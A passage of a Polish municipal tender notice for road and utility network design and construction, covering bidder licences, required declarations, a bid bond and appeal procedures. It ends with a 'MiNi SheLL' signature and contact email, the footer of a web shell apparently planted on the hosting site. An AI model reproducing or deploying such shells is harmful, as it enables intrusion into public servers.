realizacji zamówienia, przy czym warunek<br/>Zamawiający uzna za spełniony, jeżeli Wykonawca wykaże, że dysponuje (będzie dysponował na podstawie pisemnego<br/>zobowiązania innych podmiotów do oddania mu do dyspozycji niezbędnych zasobów) n/w osobami zdolnymi do wykonania<br/>zamówienia, które posiadają uprawnienia do wykonywania samodzielnych funkcji technicznych, określonych przepisami<br/>ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tj. Dz.U. z 2021 r. poz. 2351 z późn.zm.) lub odpowiadające im ważne<br/>uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów, a w stosunku do Wykonawców<br/>zagranicznych równoważne kwalifikacje zdobyte w innych państwach na zasadach określonych art. 12a ustawy Prawo<br/>budowlane, z uwzględnieniem ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w<br/>państwach członkowskich Unii Europejskiej (Dz.U. z 2021 r., poz. 1646 z późn. zm.), tj.:<br/>- przynajmniej 1 osobą posiadającą uprawnienia budowlane<br/>do projektowania w specjalności: inżynieryjnej drogowej w ograniczonym zakresie,<br/>oraz<br/>- przynajmniej 1 osobą posiadającą uprawnienia budowlane<br/>do projektowania w specjalności: instalacyjnej w zakresie sieci, instalacji<br/>i urządzeń telekomunikacyjnych w ograniczonym zakresie,<br/>oraz<br/>- przynajmniej 1 osobą posiadającą uprawnienia budowlane<br/>do projektowania w specjalności: instalacyjnej w zakresie sieci, instalacji<br/>i urządzeń elektrycznych i elektroenergetycznych w ograniczonym zakresie,<br/>oraz<br/>- przynajmniej 1 osobą posiadającą uprawnienia budowlane do projektowania<br/>w specjalności: instalacyjnej w zakresie sieci, instalacji i urządzeń gazowych<br/>w ograniczonym zakresie,<br/>oraz<br/>- przynajmniej 1 osobą posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności: inżynieryjnej<br/>drogowej<br/>w ograniczonym zakresie,<br/>oraz<br/>- przynajmniej 1 osobą posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności: instalacyjnej w<br/>zakresie sieci, instalacji<br/>i urządzeń telekomunikacyjnych w ograniczonym zakresie,<br/>oraz<br/>- przynajmniej 1 osobą posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności: instalacyjnej w<br/>zakresie sieci, instalacji<br/>i urządzeń elektrycznych i elektroenergetycznych w ograniczonym zakresie,<br/>oraz<br/>- przynajmniej 1 osobą posiadającą uprawnienia budowlane do projektowania<br/>w specjalności: instalacyjnej w zakresie sieci, instalacji i urządzeń gazowych<br/>w ograniczonym zakresie.<br/>Zamawiający dopuszcza możliwość łączenia uprawnień do projektowania oraz kierowania robotami budowlanymi w<br/>poszczególnych specjalnościach.<br/>Dopuszcza się uprawnienia równoważne (w zakresie koniecznym do wykonania przedmiotu zamówienia) - dla osób, które<br/>posiadają uprawnienia uzyskane przed dniem wejścia w życie ustawy z dnia 7 lipca 1994 r. Prawo budowlane lub<br/>stwierdzenie posiadania przygotowania zawodowego do pełnienia samodzielnych funkcji technicznych w budownictwie i<br/>zachowały uprawnienia do pełnienia tych funkcji w dotychczasowym zakresie.<br/>Uwaga:<br/>Wykonawca jest obowiązany wykazać spełnianie warunków udziału w postępowaniu określonych w Ogłoszeniu o<br/>zamówieniu i SWZ, w sposób i za pomocą dowodów określonych w Prawie zamówień publicznych, w Rozporządzeniu w<br/>sprawie podmiotowych środków dowodowych oraz Ogłoszeniu o zamówieniu i w SWZ.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek udziału w postępowaniu<br/>określony w ust. 1 powinien spełniać co najmniej jeden z Wykonawców wspólnie ubiegających się o zamówienie.<br/>3. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty<br/>budowlane lub usługi, do realizacji których te zdolności są wymagane. W takim przypadku, wykonawcy wspólnie ubiegający<br/>się o udzielenie zamówienia składają oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają<br/>poszczególni wykonawcy.<br/>4. Zamawiający może na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli<br/>posiadanie przez Wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację<br/>zamówienia.<br/>5. Ocena spełniania warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą „spełnia”/„nie spełnia”, w<br/>oparciu o informacje zawarte w dokumentach i oświadczeniach. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) Do oferty Wykonawca<br/>zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie stanowiące dowód tymczasowo zastępujący wymagane<br/>przez zamawiającego podmiotowe środki dowodowe potwierdzające że Wykonawca:<br/>- nie podleganiu wykluczeniu,<br/>- spełniania warunki udziału w postępowaniu.<br/>Informacje zawarte w oświadczeniu, o którym mowa w pkt 1 stanowią wstępne potwierdzenie, że Wykonawca nie podlega<br/>wykluczeniu oraz spełnia warunki udziału w postępowaniu.<br/>Oświadczenie to stanowi dowód potwierdzający brak podstaw wykluczenia, na dzień składania ofert. Oświadczenie składane jest<br/>pod rygorem nieważności w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym albo w formie<br/>elektronicznej.<br/>W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym mowa w niniejszym punkcie,<br/>składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w<br/>postępowaniu lub kryteriów selekcji w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w<br/>postępowaniu lub kryteriów selekcji.<br/>Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia, wraz z<br/>oświadczeniem, o którym mowa w niniejszym punkcie, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak<br/>podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu lub kryteriów selekcji, w<br/>zakresie, w jakim wykonawca powołuje się na jego zasoby.<br/>2. Wykaz podmiotowych środków dowodowych składnych na wezwanie Zamawiającego przez Wykonawcę, którego oferta została<br/>najwyżej oceniona w przedmiotowym postępowaniu w celu potwierdzenia braku podstaw do wykluczenia:<br/>1) oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (tekst jedn.: Dz. U. z 2021 r., poz. 275), z innym<br/>wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub<br/>informacjami potwierdzającymi przygotowanie oferty, niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej;<br/>2) oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 Prawa zamówień<br/>publicznych w zakresie podstaw wykluczenia z postępowania określonych w:<br/>a) art. 108 ust. 1 pkt 3 ustawy,<br/>b) art. 108 ust. 1 pkt 4 ustawy, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka<br/>zapobiegawczego,<br/>c) art. 108 ust. 1 pkt 5 ustawy, dotyczących zawarcia z innymi wykonawcami porozumienia mającego na celu zakłócenie konkurencji,<br/>d) art. 108 ust. 1 pkt 6 ustawy.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) Do<br/>oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie stanowiące dowód tymczasowo<br/>zastępujący wymagane przez zamawiającego podmiotowe środki dowodowe potwierdzające że Wykonawca:<br/>- nie podleganiu wykluczeniu<br/>- spełniania warunki udziału w postępowaniu.<br/>Informacje zawarte w oświadczeniu, o którym mowa w pkt 1 stanowią wstępne potwierdzenie, że Wykonawca nie podlega<br/>wykluczeniu oraz spełnia warunki udziału w postępowaniu.<br/>Oświadczenie to stanowi dowód potwierdzający brak podstaw wykluczenia, na dzień składania ofert.<br/>W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym mowa w niniejszym punkcie,<br/>składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w<br/>postępowaniu lub kryteriów selekcji w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w<br/>postępowaniu lub kryteriów selekcji.<br/>Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia, wraz z<br/>oświadczeniem, o którym mowa w niniejszym punkcie, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak<br/>podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu lub kryteriów selekcji, w<br/>zakresie, w jakim wykonawca powołuje się na jego zasoby.<br/>2)Do oferty Wykonawca zobowiązany jest dołączyć także Zobowiązanie podmiotu udostępniającego zasoby (lub inny podmiotowy<br/>środek dowodowy), które powinno potwierdzać, że stosunek łączący wykonawcę z podmiotami udostępniającymi zasoby gwarantuje<br/>rzeczywisty dostęp do tych zasobów oraz określać w szczególności:<br/>-zakres dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>-sposób i okres udostępnienia wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby przy<br/>wykonywaniu zamówienia;<br/>-czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego wykonawca polega w odniesieniu do warunków<br/>udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane lub<br/>usługi, których wskazane zdolności dotyczą.<br/>Wykaz podmiotowych środków dowodowych składnych na wezwanie Zamawiającego przez Wykonawcę, którego oferta zostanie<br/>najwyżej oceniona w przedmiotowym postępowaniu w celu potwierdzenia spełniania warunków udziału w postępowaniu:<br/>1) informacje z banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzająca wysokość posiadanych środków<br/>finansowych lub zdolność kredytową wykonawcy, w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem;<br/>2) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest<br/>krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączenie dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym<br/>dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane<br/>zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne<br/>odpowiednie dokumenty (wzór wykazu stanowi załącznik nr 6 do SWZ),<br/>3) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu<br/>wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (wzór wykazu stanowi załącznik nr<br/>7 do SWZ).</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Gdy umocowanie osoby składającej ofertę nie wynika z dokumentów rejestrowych, wykonawca, który składa ofertę za pośrednictwem pełnomocnika, powinien dołączyć do oferty dokument pełnomocnictwa obejmujący swym zakresem<br/>umocowanie do złożenia oferty lub do złożenia oferty i podpisania umowy.<br/>W przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia wykonawcy zobowiązani są do ustanowienia<br/>pełnomocnika. Dokument pełnomocnictwa, z treści którego będzie wynikało umocowanie do reprezentowania w<br/>postępowaniu o udzielenie zamówienia tych wykonawców należy załączyć do oferty.<br/>Pełnomocnictwo powinno być załączone do oferty i powinno zawierać w szczególności wskazanie:<br/>- postępowania o zamówienie publiczne, którego dotyczy,<br/>- wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu<br/>siedziby,<br/>- ustanowionego pełnomocnika oraz zakresu jego umocowania.<br/>W sytuacji, gdy oferta lub inne dokumenty składane w toku postępowania będą zawierały tajemnicę przedsiębiorstwa,<br/>wykonawca, wraz z przekazaniem takich informacji, zastrzega, że nie mogą być one udostępniane, oraz wykazuje, że<br/>zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z 16 kwietnia 1993 r. o<br/>zwalczaniu nieuczciwej konkurencji.<br/>W przypadku gdy określony dokument elektroniczny zawiera informacje stanowiące tajemnicę przedsiębiorstwa Wykonawca, w celu utrzymania w poufności tych informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca przystępujący do postępowania jest zobowiązany, przed upływem terminu składania ofert, wnieść wadium w<br/>kwocie: 24.000,00 zł (dwadzieścia cztery tysiące złotych 00/100).<br/>2. Wadium musi zostać wniesione przed upływem terminu składania ofert i obejmować pełen okres związania ofertą, z<br/>wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy Pzp.<br/>3. Przedłużenie terminu związania ofertą jest dopuszczalne tylko z jednoczesnym przedłużeniem okresu ważności wadium<br/>albo, jeżeli nie jest to możliwe, z wniesieniem nowego wadium na przedłużony okres związania ofertą.<br/>4. Wadium może być wniesione w jednej lub kilku formach wskazanych w art. 97 ust. 7 ustawy Pzp.<br/>5. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego w ING Bank Śląski 87<br/>1050 1298 1000 0023 5623 8861, tytuł przelewu: „wadium na zabezpieczenie oferty w postępowaniu: Znak sprawy<br/>ZRP.271.13.2023”.<br/>Za skuteczny termin wniesienia wadium w formie pieniężnej, przyjęty będzie termin uznania rachunku Zamawiającego.<br/>6. W przypadku wnoszenia wadium w formach niepieniężnych, wymagane jest załączenie do oferty oryginalnego dokumentu gwarancji/poręczenia w postaci elektronicznej za pośrednictwem platformy zakupowej.<br/>7. Zamawiający wymaga, aby gwarancja/poręczenie zawierały w swojej treści nieodwołalne i bezwarunkowe zobowiązanie wystawcy dokumentu do zapłaty na pierwsze pisemne żądanie na rzecz Zamawiającego pełnej kwoty wadium oraz obejmowały odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę, określone w art. 98<br/>ust. 6 ustawy Pzp.<br/>8. Oferta Wykonawcy, który nie wniesie wadium lub wniesie wadium w sposób nieprawidłowy, lub nie będzie utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 ustawy Pzp zostanie odrzucona z postępowania na podstawie art. 226 ust. 1 pkt 14 ustawy Pzp.<br/>9. Zamawiający dokona zwrotu wadium na zasadach określonych w art. 98 ust. 1-2 oraz 4-5 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia<br/>publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenie, o którym mowa w rozdziale VIII ust. 1 pkt 1 SWZ, składa każdy z wykonawców, na zasadach określonych w Rozdziale VIII SWZ.<br/>Oświadczenia to potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z<br/>wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający, poza możliwością zmiany zawartej umowy na podstawie art. 455, ustawy Pzp, przewiduje również w związku<br/>z ust. 1 pkt 1 przywołanego przepisu możliwość dokonywania zmian postanowień zawartej umowy, także w stosunku do<br/>treści oferty, na podstawie, której dokonano wyboru Wykonawcy. Zakres zmian umowy został określony w załączniku nr 8 do SWZ- wzór umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-05-04 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/toszek</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-05-04 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-06-13</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Środki ochrony prawnej określone w niniejszym dziale przysługują Wykonawcy, uczestnikowi konkursu oraz innemu podmiotowi, jeżeli ma lub miał interes w uzyskaniu zamówienia lub nagrody w konkursie oraz poniósł lub może ponieść szkodę w wyniku naruszenia przez zamawiającego przepisów ustawy PZP.<br/>2. Środki ochrony prawnej wobec ogłoszenia wszczynającego postępowanie o udzielenie zamówienia lub ogłoszenia o konkursie oraz dokumentów zamówienia przysługują również organizacjom wpisanym na listę, o której mowa w art. 469 pkt 15 PZP oraz Rzecznikowi Małych i Średnich Przedsiębiorców.<br/>3. Odwołanie przysługuje na:<br/>1) niezgodną z przepisami ustawy czynność Zamawiającego, podjętą w postępowaniu o udzielenie zamówienia, w tym na projektowane postanowienie umowy;<br/>2) zaniechanie czynności w postępowaniu o udzielenie zamówienia do której zamawiający był obowiązany na podstawie<br/>ustawy.<br/>4. Odwołanie wnosi się do Prezesa Izby. Odwołujący przekazuje zamawiającemu odwołanie wniesione w formie<br/>elektronicznej albo postaci elektronicznej albo kopię tego odwołania, jeżeli zostało ono wniesione w formie pisemnej, przed<br/>upływem terminu do wniesienia odwołania w taki sposób, aby mógł on zapoznać się z jego treścią przed upływem tego<br/>terminu.<br/>5. Odwołanie wobec treści ogłoszenia lub wobec treści dokumentów zamówienia wnosi się w terminie 5 dni od dnia<br/>zamieszczenia ogłoszenia w Biuletynie Zamówień Publicznych lub dokumentów zamówienia na stronie internetowej.<br/>6. Odwołanie wnosi się w terminie:<br/>1) 5 dni od dnia przekazania informacji o czynności zamawiającego stanowiącej podstawę jego wniesienia, jeżeli informacja<br/>została przekazana przy użyciu środków komunikacji elektronicznej;<br/>2) 10 dni od dnia przekazania informacji o czynności zamawiającego stanowiącej podstawę jego wniesienia, jeżeli informacja została przekazana w sposób inny niż określony w pkt 1).<br/>7. Odwołanie w przypadkach innych niż określone w ust. 5 i 6 wnosi się w terminie 5 dni od dnia, w którym powzięto lub przy zachowaniu należytej staranności można było powziąć wiadomość o okolicznościach stanowiących podstawę jego wniesienia.<br/>8. Na orzeczenie Izby oraz postanowienie Prezesa Izby, o którym mowa w art. 519 ust. 1 ustawy PZP, stronom oraz uczestnikom postępowania odwoławczego przysługuje skarga do Sądu Okręgowego w Warszawie.<br/>9. Skargę wnosi się za pośrednictwem Prezesa Izby, w terminie 14 dni od dnia doręczenia orzeczenia Izby lub postanowienia Prezesa Izby, o którym mowa w art. 519 ust. 1, przesyłając jednocześnie jej odpis przeciwnikowi skargi.<br/>Złożenie skargi w placówce pocztowej operatora wyznaczonego w rozumieniu ustawy z dnia 23 listopada 2012 r. - Prawo<br/>pocztowe albo wysłanie na adres do doręczeń elektronicznych, o którym mowa w art. 2 pkt 1 ustawy z dnia 18 listopada 2020 r. o doręczeniach elektronicznych, jest równoznaczne z jej wniesieniem.<br/>Dodatkowe przesłanki wykluczenia z postępowania:<br/>1. Z postępowania o udzielenie zamówienia publicznego wyklucza się wykonawcę, wobec którego zachodzi którakolwiek z okoliczności wskazanych w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2022 r., poz.<br/>835 z późn. zm.) – dalej: „ustawa sankcyjna”.<br/>2. Wykluczenie następuje na okres trwania okoliczności określonych w ust. 1.<br/>3. Okres wykluczenia, o którym mowa w ust. 2 rozpoczyna się nie wcześniej niż po upływie 14 dni od dnia wejścia w życie<br/>niniejszej ustawy sankcyjnej.”<br/>3. Z postępowania o udzielenie zamówienia publicznego wyklucza się wykonawcę, wobec którego zachodzi którakolwiek z<br/>okoliczności wskazanych w art. 5k rozporządzenia Rady (UE) nr 833/2014 z dnia 31 lipca 2014 r. dotyczące środków<br/>ograniczających w związku z działaniami Rosji destabilizującymi sytuację na Ukrainie w brzmieniu nadanym rozporządzeniem nr 2022/576 z dnia 8 kwietnia 2022 r. (Dz.U.UE.L.2022.111.1).

Creat By MiNi SheLL
Email: jattceo@gmail.com